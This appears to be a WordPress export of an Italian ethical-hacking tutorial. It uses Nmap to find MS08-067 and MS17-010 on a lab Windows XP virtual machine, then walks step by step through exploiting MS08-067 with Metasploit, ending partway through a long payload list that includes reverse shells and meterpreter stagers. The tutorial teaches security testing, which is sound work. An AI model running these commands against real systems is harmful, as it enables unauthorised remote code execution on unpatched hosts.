{"id":1803,"date":"2019-03-04T15:26:37","date_gmt":"2019-03-04T14:26:37","guid":{"rendered":"https:\/\/christeninformatica.ch\/?p=1803"},"modified":"2023-05-09T06:43:12","modified_gmt":"2023-05-09T04:43:12","slug":"testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking","status":"publish","type":"post","link":"https:\/\/christeninformatica.ch\/it\/testare-sicurezza-sistema-windows-nmap-metasploit-payloads-options-exploitation-penetration-testing-guida-italiano-ethical-hacking\/","title":{"rendered":"Ethical Hacking – Testare la sicurezza – Nmap e Metasploit"},"content":{"rendered":"

In questo esempio testeremo la sicurezza<\/b> di un ipotetico client presente nella rete con un vecchio sistema operativo non aggiornato. L\u2019indirizzo IP del client da testare \u00e8 10.10.10.7, il sistema operativo in uso \u00e8 Windows XP PRO SP3 e non \u00e8 aggiornato. Ho scelto di proposito un sistema vecchio e non aggiornato per rendere pi\u00f9 facile la preparazione dell’esercizio ed essere sicuro di trovare gravi vulnerabilit\u00e0<\/b> da “exploitare”, il procedimento \u00e8 comunque uguale con i sistemi pi\u00f9 moderni.<\/p>\n

Scansione vulnerabilit\u00e0 con Nmap<\/h2>\n
\n
\n
workstation:\/home\/chit # nmap --script vuln 10.10.10.7\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-03-02 01:12 CET\nNmap scan report for 10.10.10.7\nHost is up (0.00032s latency).\nNot shown: 997 closed ports\nPORT    STATE SERVICE\n135\/tcp open  msrpc\n139\/tcp open  netbios-ssn\n445\/tcp open  microsoft-ds\nMAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)\n\nHost script results:\n|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED\n| smb-vuln-ms08-067:\n|   VULNERABLE:\n|   Microsoft Windows system vulnerable to remote code execution (MS08-067)\n|     State: VULNERABLE\n|     IDs:  CVE:CVE-2008-4250\n|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,\n|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary\n|           code via a crafted RPC request that triggers the overflow during path canonicalization.\n|\n|     Disclosure date: 2008-10-23\n|     References:\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms08-067.aspx\n|_      https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2008-4250\n|_smb-vuln-ms10-054: false\n|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)\n| smb-vuln-ms17-010:\n|   VULNERABLE:\n|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)\n|     State: VULNERABLE\n|     IDs:  CVE:CVE-2017-0143\n|     Risk factor: HIGH\n|       A critical remote code execution vulnerability exists in Microsoft SMBv1\n|        servers (ms17-010).\n|\n|     Disclosure date: 2017-03-14\n|     References:\n|       https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-0143\n|       https:\/\/technet.microsoft.com\/en-us\/library\/security\/ms17-010.aspx\n|_      https:\/\/blogs.technet.microsoft.com\/msrc\/2017\/05\/12\/customer-guidance-for-wannacrypt-attacks\/\n\nNmap done: 1 IP address (1 host up) scanned in 41.40 seconds\nworkstation:\/home\/chit #\n<\/pre>\n<\/blockquote>\n<\/div>\n
Per rilevare il sistema operativo in uso usare l’opzione -O di Nmap<\/b>.<\/p>\n
\n
\n
workstation:\/home\/chit # nmap -O 10.10.10.7\nStarting Nmap 7.70 ( https:\/\/nmap.org ) at 2019-03-03 19:16 CET\nNmap scan report for 10.10.10.7\nHost is up (0.00038s latency).\nNot shown: 997 closed ports\nPORT    STATE SERVICE\n135\/tcp open  msrpc\n139\/tcp open  netbios-ssn\n445\/tcp open  microsoft-ds\nMAC Address: 08:00:27:E5:BD:58 (Oracle VirtualBox virtual NIC)\nDevice type: general purpose\nRunning: Microsoft Windows XP|2003\nOS CPE: cpe:\/o:microsoft:windows_xp cpe:\/o:microsoft:windows_server_2003\nOS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2\nNetwork Distance: 1 hop\n\nOS detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 27.83 seconds\nworkstation:\/home\/chit #\n<\/pre>\n<\/blockquote>\n<\/div>\n
Come si pu\u00f2 vedere dai risultati della scansione, Nmap<\/b> ha rilevato due gravi vulnerabilit\u00e0<\/b> nel sistema testato e scoperto il sistema operativo in uso (Microsoft Windows XP SP2 or SP3, or Windows Server 2003, Microsoft Windows XP SP2 or Windows Server 2003 SP2). In questo esempio ho creato una macchina virtuale e so che il target in questione \u00e8 Microsoft Windows XP SP3 Italian. La vulnerabilit\u00e0<\/b> che andremo a vedere nel dettaglio e ad \u201cexploitare\u201d, \u00e8 \u201cMS08-067\u201d. Si tratta di una vulnerabilit\u00e0 che permette di eseguire comandi da remoto sul sistema preso di mira.<\/p>\n
Exploitare vulnerabilit\u00e0 in modo automatico con Metasploit<\/h2>\n
Ora che abbiamo rilevato e scelto la vulnerabilit\u00e0<\/b> da “exploitare” passiamo a Metasploit<\/b>. Con Metasploit<\/b> \u00e8 possibile \u201cexploitare\u201d applicazioni in modo automatico senza bisogno di andare a cercare gli exploits<\/b> nelle banche dati online.<\/p>\n
Metasploit – Search module<\/h3>\n
Una volta avviato Metasploit<\/b> cercare l\u2019exploit<\/b> con il seguente comando: \u201csearch MS08-67<\/b>\u201d. Metasploit<\/b> mostrer\u00e0 i moduli trovati.<\/p>\n
\n
\n
msf > search ms08-067\n\nMatching Modules\n================\n\n   Name                                 Disclosure Date  Rank   Description\n   ----                                 ---------------  ----   -----------\n   exploit\/windows\/smb\/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption\n\n\nmsf > \n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit – Use<\/h3>\n
Per usare un modulo eseguire \u201cuse\u201d seguito dal modulo come segue:<\/p>\n
\n
\n
msf > use exploit\/windows\/smb\/ms08_067_netapi\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit – Show and set target<\/h3>\n
Per vedere la lista dei targets per l’exploit eseguire il comando show targets<\/b>.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > show targets\n\nExploit targets:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n   1   Windows 2000 Universal\n   2   Windows XP SP0\/SP1 Universal\n   3   Windows 2003 SP0 Universal\n   4   Windows XP SP2 English (AlwaysOn NX)\n   5   Windows XP SP2 English (NX)\n   6   Windows XP SP3 English (AlwaysOn NX)\n   7   Windows XP SP3 English (NX)\n   8   Windows XP SP2 Arabic (NX)\n   9   Windows XP SP2 Chinese - Traditional \/ Taiwan (NX)\n   10  Windows XP SP2 Chinese - Simplified (NX)\n   11  Windows XP SP2 Chinese - Traditional (NX)\n   12  Windows XP SP2 Czech (NX)\n   13  Windows XP SP2 Danish (NX)\n   14  Windows XP SP2 German (NX)\n   15  Windows XP SP2 Greek (NX)\n   16  Windows XP SP2 Spanish (NX)\n   17  Windows XP SP2 Finnish (NX)\n   18  Windows XP SP2 French (NX)\n   19  Windows XP SP2 Hebrew (NX)\n   20  Windows XP SP2 Hungarian (NX)\n   21  Windows XP SP2 Italian (NX)\n   22  Windows XP SP2 Japanese (NX)\n   23  Windows XP SP2 Korean (NX)\n   24  Windows XP SP2 Dutch (NX)\n   25  Windows XP SP2 Norwegian (NX)\n   26  Windows XP SP2 Polish (NX)\n   27  Windows XP SP2 Portuguese - Brazilian (NX)\n   28  Windows XP SP2 Portuguese (NX)\n   29  Windows XP SP2 Russian (NX)\n   30  Windows XP SP2 Swedish (NX)\n   31  Windows XP SP2 Turkish (NX)\n   32  Windows XP SP3 Arabic (NX)\n   33  Windows XP SP3 Chinese - Traditional \/ Taiwan (NX)\n   34  Windows XP SP3 Chinese - Simplified (NX)\n   35  Windows XP SP3 Chinese - Traditional (NX)\n   36  Windows XP SP3 Czech (NX)\n   37  Windows XP SP3 Danish (NX)\n   38  Windows XP SP3 German (NX)\n   39  Windows XP SP3 Greek (NX)\n   40  Windows XP SP3 Spanish (NX)\n   41  Windows XP SP3 Finnish (NX)\n   42  Windows XP SP3 French (NX)\n   43  Windows XP SP3 Hebrew (NX)\n   44  Windows XP SP3 Hungarian (NX)\n   45  Windows XP SP3 Italian (NX)\n   46  Windows XP SP3 Japanese (NX)\n   47  Windows XP SP3 Korean (NX)\n   48  Windows XP SP3 Dutch (NX)\n   49  Windows XP SP3 Norwegian (NX)\n   50  Windows XP SP3 Polish (NX)\n   51  Windows XP SP3 Portuguese - Brazilian (NX)\n   52  Windows XP SP3 Portuguese (NX)\n   53  Windows XP SP3 Russian (NX)\n   54  Windows XP SP3 Swedish (NX)\n   55  Windows XP SP3 Turkish (NX)\n   56  Windows 2003 SP1 English (NO NX)\n   57  Windows 2003 SP1 English (NX)\n   58  Windows 2003 SP1 Japanese (NO NX)\n   59  Windows 2003 SP1 Spanish (NO NX)\n   60  Windows 2003 SP1 Spanish (NX)\n   61  Windows 2003 SP1 French (NO NX)\n   62  Windows 2003 SP1 French (NX)\n   63  Windows 2003 SP2 English (NO NX)\n   64  Windows 2003 SP2 English (NX)\n   65  Windows 2003 SP2 German (NO NX)\n   66  Windows 2003 SP2 German (NX)\n   67  Windows 2003 SP2 Portuguese - Brazilian (NX)\n   68  Windows 2003 SP2 Spanish (NO NX)\n   69  Windows 2003 SP2 Spanish (NX)\n   70  Windows 2003 SP2 Japanese (NO NX)\n   71  Windows 2003 SP2 French (NO NX)\n   72  Windows 2003 SP2 French (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) > \n<\/pre>\n<\/blockquote>\n<\/div>\n
Chiaramente non c’\u00e8 bisogno di scegliere il target – nella maggior parte dei casi -, Metasploit<\/b> rileva automaticamente il sistema operativo in uso. Lasciare quindi su 0, automatico.<\/p>\n
Se per caso si dovesse avere il bisogno di impostare manualmente il target, usare il seguente comando:<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > set target 45\ntarget => 45\nmsf exploit(windows\/smb\/ms08_067_netapi) > show options \n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    \t\t     yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   45  Windows XP SP3 Italian (NX)\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit<\/b> – Show options<\/h3>\n
Ora, il resto dei dati da inserire per potere eseguire l’exploit<\/b> con successo vengono mostrati con il comando “show options<\/b>“.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > show options \n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST                     yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit module option RHOST<\/h4>\n
Rhost, che sta per remote host, \u00e8 l\u2019host da attaccare\/testare, in questo esempio l\u2019indirizzo IP 10.10.10.7.<\/p>\n
Metasploit module option RPORT<\/h4>\n
Rport (Remote Port) viene aggiunto automaticamente da metasploit perch\u00e9 la porta 445 \u00e8 quella standard dell\u2019applicazione da “exploitare”. Lasciare com’\u00e8 nella maggior parte dei casi.<\/p>\n
Metasploit module option SMBPIPE<\/h4>\n
Come nel caso della porta (RPORT) lasciare le impostazioni di default, BROWSER.<\/p>\n
Metasploit – Set RHOST<\/h3>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > set rhost 10.10.10.7\nrhost => 10.10.10.7\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Ogni volta che si cambia qualcosa si pu\u00f2 controllare con il comando “show options” se la modifica \u00e8 stata apportata con successo.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > show options \n\nModule options (exploit\/windows\/smb\/ms08_067_netapi):\n\n   Name     Current Setting  Required  Description\n   ----     ---------------  --------  -----------\n   RHOST    10.10.10.7       yes       The target address\n   RPORT    445              yes       The SMB service port (TCP)\n   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)\n\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n\n\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit – Check<\/h3>\n
Una volta inseriti i dati necessari per la corretta esecuzione dell’exploit<\/b>, si pu\u00f2 controllare se l’host \u00e8 vulnerabile<\/b> a un attacco con il comando check.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > check\n[+] 10.10.10.7:445 The target is vulnerable.\nmsf exploit(windows\/smb\/ms08_067_netapi) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
Metasploit – Payloads<\/h3>\n
Non abbiamo ancora finito, ora dobbiamo dire a Metasploit<\/b> cosa fare una volta che il target \u00e8 stato “exploitato<\/b>“. Basta scegliere un Payload compatibile da eseguire dopo avere eseguito l’exploit con successo.<\/p>\n
Metasploit – Show payloads<\/h4>\n
Per vedere un elenco di Payloads<\/b> compatibili disponibili per questo modulo eseguire il comando “show payloads<\/b>“.<\/p>\n
\n
\n
msf exploit(windows\/smb\/ms08_067_netapi) > show payloads\n\nCompatible Payloads\n===================\n\n   Name                                                Disclosure Date  Rank    Description\n   ----                                                ---------------  ----    -----------\n   generic\/custom                                                       normal  Custom Payload\n   generic\/debug_trap                                                   normal  Generic x86 Debug Trap\n   generic\/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline\n   generic\/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline\n   generic\/tight_loop                                                   normal  Generic x86 Tight Loop\n   windows\/adduser                                                      normal  Windows Execute net user \/ADD\n   windows\/dllinject\/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager\n   windows\/dllinject\/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager\n   windows\/dllinject\/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)\n   windows\/dllinject\/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/dllinject\/bind_named_pipe                                    normal  Reflective DLL Injection, Windows x86 Bind Named Pipe Stager\n   windows\/dllinject\/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)\n   windows\/dllinject\/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)\n   windows\/dllinject\/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/dllinject\/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/dllinject\/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP\/HTTPS Stager\n   windows\/dllinject\/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)\n   windows\/dllinject\/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)\n   windows\/dllinject\/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)\n   windows\/dllinject\/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/dllinject\/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager\n   windows\/dllinject\/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager\n   windows\/dllinject\/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)\n   windows\/dllinject\/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/dllinject\/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support\n   windows\/dllinject\/reverse_udp                                        normal  Reflective DLL Injection, Reverse UDP Stager with UUID Support\n   windows\/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution\n   windows\/exec                                                         normal  Windows Execute Command\n   windows\/format_all_drives                                            manual  Windows Drive Formatter\n   windows\/loadlibrary                                                  normal  Windows LoadLibrary Path\n   windows\/messagebox                                                   normal  Windows MessageBox\n   windows\/meterpreter\/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager\n   windows\/meterpreter\/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager\n   windows\/meterpreter\/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)\n   windows\/meterpreter\/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/meterpreter\/bind_named_pipe                                  normal  Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager\n   windows\/meterpreter\/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)\n   windows\/meterpreter\/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)\n   windows\/meterpreter\/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/meterpreter\/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)\n   windows\/meterpreter\/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP\/HTTPS Stager\n   windows\/meterpreter\/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)\n   windows\/meterpreter\/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)\n   windows\/meterpreter\/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy\n   windows\/meterpreter\/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)\n   windows\/meterpreter\/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager\n   windows\/meterpreter\/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)\n   windows\/meterpreter\/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/meterpreter\/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager\n   windows\/meterpreter\/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager\n   windows\/meterpreter\/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)\n   windows\/meterpreter\/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/meterpreter\/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support\n   windows\/meterpreter\/reverse_udp                                      normal  Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support\n   windows\/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP\n   windows\/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline\n   windows\/patchupdllinject\/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager\n   windows\/patchupdllinject\/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager\n   windows\/patchupdllinject\/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)\n   windows\/patchupdllinject\/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/patchupdllinject\/bind_named_pipe                             normal  Windows Inject DLL, Windows x86 Bind Named Pipe Stager\n   windows\/patchupdllinject\/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)\n   windows\/patchupdllinject\/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)\n   windows\/patchupdllinject\/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupdllinject\/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/patchupdllinject\/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)\n   windows\/patchupdllinject\/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)\n   windows\/patchupdllinject\/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/patchupdllinject\/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager\n   windows\/patchupdllinject\/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager\n   windows\/patchupdllinject\/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)\n   windows\/patchupdllinject\/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupdllinject\/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support\n   windows\/patchupdllinject\/reverse_udp                                 normal  Windows Inject DLL, Reverse UDP Stager with UUID Support\n   windows\/patchupmeterpreter\/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape\/jt Injection), Hidden Bind Ipknock TCP Stager\n   windows\/patchupmeterpreter\/bind_hidden_tcp                           normal  Windows Meterpreter (skape\/jt Injection), Hidden Bind TCP Stager\n   windows\/patchupmeterpreter\/bind_ipv6_tcp                             normal  Windows Meterpreter (skape\/jt Injection), Bind IPv6 TCP Stager (Windows x86)\n   windows\/patchupmeterpreter\/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape\/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/patchupmeterpreter\/bind_named_pipe                           normal  Windows Meterpreter (skape\/jt Injection), Windows x86 Bind Named Pipe Stager\n   windows\/patchupmeterpreter\/bind_nonx_tcp                             normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager (No NX or Win7)\n   windows\/patchupmeterpreter\/bind_tcp                                  normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager (Windows x86)\n   windows\/patchupmeterpreter\/bind_tcp_rc4                              normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupmeterpreter\/bind_tcp_uuid                             normal  Windows Meterpreter (skape\/jt Injection), Bind TCP Stager with UUID Support (Windows x86)\n   windows\/patchupmeterpreter\/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (IPv6)\n   windows\/patchupmeterpreter\/reverse_nonx_tcp                          normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (No NX or Win7)\n   windows\/patchupmeterpreter\/reverse_ord_tcp                           normal  Windows Meterpreter (skape\/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/patchupmeterpreter\/reverse_tcp                               normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager\n   windows\/patchupmeterpreter\/reverse_tcp_allports                      normal  Windows Meterpreter (skape\/jt Injection), Reverse All-Port TCP Stager\n   windows\/patchupmeterpreter\/reverse_tcp_dns                           normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (DNS)\n   windows\/patchupmeterpreter\/reverse_tcp_rc4                           normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/patchupmeterpreter\/reverse_tcp_uuid                          normal  Windows Meterpreter (skape\/jt Injection), Reverse TCP Stager with UUID Support\n   windows\/patchupmeterpreter\/reverse_udp                               normal  Windows Meterpreter (skape\/jt Injection), Reverse UDP Stager with UUID Support\n   windows\/shell\/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager\n   windows\/shell\/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager\n   windows\/shell\/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)\n   windows\/shell\/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/shell\/bind_named_pipe                                        normal  Windows Command Shell, Windows x86 Bind Named Pipe Stager\n   windows\/shell\/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)\n   windows\/shell\/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)\n   windows\/shell\/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/shell\/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/shell\/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)\n   windows\/shell\/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)\n   windows\/shell\/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/shell\/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager\n   windows\/shell\/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager\n   windows\/shell\/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)\n   windows\/shell\/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/shell\/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support\n   windows\/shell\/reverse_udp                                            normal  Windows Command Shell, Reverse UDP Stager with UUID Support\n   windows\/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline\n   windows\/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline\n   windows\/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline\n   windows\/speak_pwned                                                  normal  Windows Speech API - Say \"You Got Pwned!\"\n   windows\/upexec\/bind_hidden_ipknock_tcp                               normal  Windows Upload\/Execute, Hidden Bind Ipknock TCP Stager\n   windows\/upexec\/bind_hidden_tcp                                       normal  Windows Upload\/Execute, Hidden Bind TCP Stager\n   windows\/upexec\/bind_ipv6_tcp                                         normal  Windows Upload\/Execute, Bind IPv6 TCP Stager (Windows x86)\n   windows\/upexec\/bind_ipv6_tcp_uuid                                    normal  Windows Upload\/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)\n   windows\/upexec\/bind_named_pipe                                       normal  Windows Upload\/Execute, Windows x86 Bind Named Pipe Stager\n   windows\/upexec\/bind_nonx_tcp                                         normal  Windows Upload\/Execute, Bind TCP Stager (No NX or Win7)\n   windows\/upexec\/bind_tcp                                              normal  Windows Upload\/Execute, Bind TCP Stager (Windows x86)\n   windows\/upexec\/bind_tcp_rc4                                          normal  Windows Upload\/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/upexec\/bind_tcp_uuid                                         normal  Windows Upload\/Execute, Bind TCP Stager with UUID Support (Windows x86)\n   windows\/upexec\/reverse_ipv6_tcp                                      normal  Windows Upload\/Execute, Reverse TCP Stager (IPv6)\n   windows\/upexec\/reverse_nonx_tcp                                      normal  Windows Upload\/Execute, Reverse TCP Stager (No NX or Win7)\n   windows\/upexec\/reverse_ord_tcp                                       normal  Windows Upload\/Execute, Reverse Ordinal TCP Stager (No NX or Win7)\n   windows\/upexec\/reverse_tcp                                           normal  Windows Upload\/Execute, Reverse TCP Stager\n   windows\/upexec\/reverse_tcp_allports                                  normal  Windows Upload\/Execute, Reverse All-Port TCP Stager\n   windows\/upexec\/reverse_tcp_dns                                       normal  Windows Upload\/Execute, Reverse TCP Stager (DNS)\n   windows\/upexec\/reverse_tcp_rc4                                       normal  Windows Upload\/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)\n   windows\/upexec\/reverse_tcp_uuid                                      normal  Windows Upload\/Execute, Reverse TCP Stager with UUID Support\n   windows\/upexec\/reverse_udp                                           normal  Windows Upload\/Execute, Reverse UDP Stager with UUID Support\n   windows\/vncinject\/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager\n   windows\/vncinject\/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager\n   